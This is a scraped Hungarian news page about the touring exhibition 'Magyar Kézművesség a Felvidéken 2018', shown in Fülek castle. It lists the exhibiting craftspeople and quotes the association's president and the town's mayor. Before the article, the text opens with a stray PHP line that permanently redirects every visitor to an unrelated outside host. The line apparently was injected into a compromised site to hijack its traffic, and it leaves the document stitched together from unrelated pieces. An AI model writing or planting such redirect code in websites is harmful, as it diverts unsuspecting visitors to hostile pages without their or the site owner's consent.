header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Felvidéki kézműves termékeket állítottak ki Füleken
szombat, május 25, 2019

Keresés

Felvidéki kézműves termékeket állítottak ki Füleken

2770Szeptember 14-16. között a füleki vár Bebek-tornyában láthatta a nagyközönség a Szlovákiai Magyar Kézműves Szövetég és a Hagyományok Háza Hálózat – Szlovákia szervezésében megvalósult Magyar Kézművesség a Felvidéken 2018 elnevezésű vándorkiállítást.

A kiállítás anyagát még a nyár elején állították össze, amikor hivatalosan is megalakult a Szlovákiai Magyar Kézműves Szövetég (. A szakmai zsűri által kiválasztott anyagok az ország különböző pontjáról érkeztek be a tavasszal meghirdetett pályázatra.

A füleki kiállításon Anderko Andrea, Bartal Tímea, Bastyúr Jaroslav, Benko Pál, Benko Tünde, Borsodi Valéria, Csupori Éva, Čabrová Eva, Éliás Ádám, Göbő Judit, Gyetvai Zsuzsanna, Jakabová Malvina, Kálmánová Jarmila, KesziováIrena, Kseničová Renáta, Lukács János, Molnár Mónika, Nagy Andrea

Németh Bozó Andrea, Palmé Ivett, Popovics Judit, Rigó Béla, Slíž Róbert, Šmelková Emília, Urbánová Anka, Varjú Tamás, Vranai Erika és a Zoboralji Örökség Őrzői Hímző- és Viseletkészítő Műhely alkotásait láthatta a nagyérdemű. A kiállítás hivatalosan szeptember 16-án nyílt meg. A szervezők célja, hogy több felvidéki településen is bemutathassák a kiválasztott alkotásokat, a tervek szerint legközelebb októberben átható majd az anyag Pogrányban. A Szlovákiai Magyar Kézműves Szövetég célja az is, hogy a jövőben is meghirdessenek hasonló pályázatot, ezzel is lehetőséget adva a kézműveseknek a bemutatkozásra és arra is, hogy egymást jobban megismerjék.

A szeptember 16-ai hivatalos megnyitón a Szlovákiai Magyar Kézműves Szövetég elnöke, Jámbor Mónika elmondta: azoknak az embereknek a munkáját láthatják a kiállításon az érdeklődők, akiknek fontos a múltjuk és az is, hogy az ismeretanyagot átadják a jövő generációnak, és megmutassák azoknak, akiknek nincsen idejük kézművességgel foglalkozni. Jámbor Mónika szerint ez egy olyan örökség, amelyre büszkék lehetünk ezért is fontos, hogy a kézműveseket és munkájukat minél szélesebb körben megismerjük.

Agócs Attila, Fülek polgármestere örömét fejezte ki, hogy a Hagyományok Háza Hálózat Fülekről segíti a szlovákiai magyar népművészettel foglalkozókat, a polgármester szerint nagyon fontos, hogy a jövőben is foglalkozzunk a népművészettel és kézműveséggel. Köszöntet mondott azért, hogy az ország különböző pontjain működő kézműveseket sikerül összefogni.

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia